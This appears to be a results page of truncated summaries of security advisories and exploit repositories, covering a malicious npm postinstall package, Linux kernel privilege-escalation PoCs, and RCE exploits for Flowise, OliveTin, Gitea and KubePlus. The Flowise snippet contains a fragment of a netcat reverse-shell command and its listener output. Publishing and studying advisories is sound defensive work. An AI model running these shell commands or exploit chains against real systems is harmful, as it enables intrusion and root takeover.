601473 matches found
Malicious code in strapi-plugin-listcc-meeb (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 63bef6a3804e282781fb0eaea1ffd045ef3b236aefd0668de11549aba1ada8b0 [email protected] declares scripts.postinstall = 'node postinstall.js' and points main at the same file, so npm install auto-executes...
MAL-2026-16232 Malicious code in strapi-plugin-listcc-meeb (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 63bef6a3804e282781fb0eaea1ffd045ef3b236aefd0668de11549aba1ada8b0 [email protected] declares scripts.postinstall = 'node postinstall.js' and points main at the same file, so npm install auto-executes...
chpwd
DEPRECATED This is an old version of a CLI password vault. The development has been shifted to vlt: https://codeberg.org/artich0ke/vlt GitHub mirror: https://github.com/b0lbas/vlt. You can still download the utility / use it as a personal password storage, however, neither is recommended. chpwd A...
GHSA-V8PV-4842-X354 OpenTelemetry.Resources.Host vulnerable to arbitrary code execution via local PATH hijacking on macOS
Summary The OpenTelemetry.Resources.Host NuGet package is affected by an untrusted search path vulnerability on macOS. The host.id resource attribute detector launches the sh and ioreg executables by bare name rather than by absolute path, so both are resolved through the PATH environment variabl...
OpenTelemetry.Resources.Host vulnerable to arbitrary code execution via local PATH hijacking on macOS
Summary The OpenTelemetry.Resources.Host NuGet package is affected by an untrusted search path vulnerability on macOS. The host.id resource attribute detector launches the sh and ioreg executables by bare name rather than by absolute path, so both are resolved through the PATH environment variabl...
Copyfail-sh
copyfail-sh No race. No offsets. No prebuilt binary to blindly trust. A bash implementation of CVE-2026-31431 Copy Fail. The script compiles a minimal C helper inline at runtime. The bash layer handles architecture detection, payload decompression and target selection; the C layer does the actual...
DirtyFrag-go
dirtyfrag-go Two bugs. One shell. No disk writes. Go port of dirtyfrag CVE-2026-43284 / CVE-2026-43500. How it works tl;dr The bug class is in the Linux kernel XFRM subsystem. When a file page is spliced into a pipe and then into an ESP-encrypted socket, the kernel decrypts the ESP payload in-pla...
CVE-2025-59528-Flowise-RCE
CVE-2025-59528-Flowise-RCE Authenticated RCE PoC for Flowise version &1|nc 10.10.15.200 443 /tmp/f' Check the listener and it should work: root@kitploit: └─$ nc -lvnp 443 listening on any 443 ... connect to 10.10.15.200 from UNKNOWN 10.129.64.221 43393 sh: can't access tty; job control turned off...
CVE-2026-9586
cve-id 捐赠 帮助维护此项目 如果您觉得此项目有用,请考虑通过 PayPal 或 ABA Mobile 支持其持续维护。 ❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។ ❤️ 每笔捐赠的百分之十将捐献给坤塔宝花儿童医院。 | 选择支付方式 使用 ABA Mobile 扫描 · 点击放大 ---|--- ⚡ 简单用法 直接从 GitHub 运行最新版本的外部下载脚本: root@kitploit: bash 此命令需要 Bash 和 curl。如果您不信任该来源,请在运行前查看远程脚本。...
CVE-2026-84361-poc
CVE-2026-84361: Composer Perforce P4PORT 命令执行 PoC English version 在 Docker 中运行 使用 Docker Compose,可以在包含受影响 Composer 2.10.2 和 Perforce p4 客户端的隔离环境中进行验证。运行容器将禁用网络、设为只读、删除所有 capability,仅 tmpfs 的 /tmp 和 /work 可写。 root@kitploit: 构建镜像(p4 从官方发布渠道获取并校验 SHA-256) docker compose build 直接验证 p4 的 rsh: 行为(默认)...
Fragnesia-go
fragnesia-go One SA. One byte at a time. No race. Go port of fragnesia CVE-2026-46300. Member of the Dirty Frag vulnerability class - separate bug, same surface, own patch. How it works tl;dr The bug is in the Linux XFRM ESP-in-TCP subsystem. When TCPULP espintcp is installed on a socket after da...
Copy-Fail-CVE-2026-31431
Copy-Fail-CVE-2026-31431 Linux 内核漏洞 CVE-2026-31431 (又称 Copy Fail )的概念验证漏洞复现 。 致谢:Copy Fail 受影响系统 Linux 内核版本 4.14 及更高版本 自 2017 年至补丁部署期间 发布的大多数主流发行版(Ubuntu、Debian、Fedora、RHEL...) 与原始漏洞利用的区别 未压缩且可读的代码 原始漏洞利用代码较为紧凑 此版本已完全展开 备份与恢复二进制文件 创建目标二进制文件(例如 /usr/bin/su)的备份 通过哈希验证完整性 执行后恢复原始状态(成功的情况下) 概念验证...
proftpd-CVE-2026-42167-analysis
CVE-2026-42167 — ProFTPD modsql SQL 注入 / 认证绕过 / 远程代码执行 独立复现、代码级根因分析,以及对 CVE-2026-42167 的坦诚暴露面分析——这是 ProFTPD modsql 日志管道中由 ZeroPath Research 披露、并在 ProFTPD 1.3.9a / 1.3.10rc1 中修复的 isescapedtext 绕过漏洞。 已在 Docker 中于 macOS / Apple Silicon 上端到端构建并验证,2026-04-29。 TL;DR — 在决定需要多担心之前,请先参阅结论 了解真实的暴露面情况。这 不是...
LSPromise
LSPromise 一条完整的利用链,可从本地不受信任的应用将权限提升至 root/内核。它不涉及内存破坏或竞态条件,因此攻击者无需进行复杂的堆喷或绕过针对内存破坏漏洞的缓解措施(如 KASLR、MTE 或 CFI),这使得该利用链在易受攻击的设备上拥有 100% 的成功率。 已在运行 Android 17 初始官方版本的 Pixel 10 上测试。请注意,它不适用于 Pixel 6a,并且由于这些内核中的另一个 bug,此问题也可能出现在其他运行 6.1.xxx-android14 内核树的设备上。 使用方法:安装 KernelSU...
CVE-2026-30225-OliveTin-RCE
OliveTin — 未认证操作执行 → RCE(+ CVE-2026-30225) 针对以出厂 guest 默认配置运行的 OliveTin 实例的提权 / 远程代码执行 PoC。已在 以 root 身份运行的 OliveTin 3000.10.0 (HTB: Enigma )上验证,可获取未认证的 root shell。 ⚠️ 仅限授权测试。 发布目的为教育、CTF 练习与防御性研究。针对非您所有或未经明确书面许可的系统使用本工具属违法行为。不提供任何担保。参见 LICENSE。 漏洞 A. Guest 可执行操作(不安全的默认配置) OliveTin 的示例 / 默认配置包含:...
Copy-Fail-CVE-2026-31431-Kubernetes-PoC
Copy Fail CVE-2026-31431 — PoC de Escape de Contenedor en Kubernetes Una prueba de concepto que demuestra cómo un contenedor completamente sin privilegios puede lograr ejecución de código a nivel de nodo en Kubernetes explotando el bug de corrupción de page-cache del kernel Linux CVE-2026-31431 a...
CVE-2026-20896
Proof of Concept Code CVE-2026-20896 This script automates the exploitation of the logic flaw in Gitea's API route validation, allowing to force the server to grant a valid administrative token through a Directory Traversal attack in the authorization header. root@kitploit: !/usr/bin/env python3...
CVE-2026-29955
KubePlus KubeconfigGenerator 命令注入漏洞 该漏洞存在于 KubePlus 的 kubeconfiggenerator 组件中,允许具有 HTTP 接口访问权限的攻击者通过 chartName 参数注入 shell 命令,以容器内 root 身份执行任意代码,并窃取具有 cluster-admin 权限的 ServiceAccount Token。推荐的 CWE 分类:CWE-78(操作系统命令注入)。 概述 KubePlus kubeconfiggenerator 组件中的 /registercrd 端点存在命令注入漏洞。该组件使用带 shell=True...
CVE-2026-6875
CVE-2026-6875 ⚡ Simple Usage Use this project only in safe and authorized environments such as: Local virtual machines Docker containers Isolated lab setups Authorized penetration testing environments Example setup: root@kitploit: git clone cd Project use python follow below Create a virtual...
zte-blade-v40-vita-unlock
ZTE Blade V40 Vita bootloader 解锁 — P606F02 / Unisoc UMS9230 / UFS 使用 CVE-2022-38694 解锁的 Linux 笔记和脚本。在我的 EEAP606F02 上完成,运行 MyOS11.0.138045EEA。 有两件事决定它能否成功,而这两件事都没有被写下来: 1. 刷写时绝不要按住 POWER。 按住 POWER 约 10 秒 = PMIC 硬复位 = USB 连接在上传中途断开(SEND fdl2-dl.bin → connection closed)。只按住 VOLUP + VOLDOWN...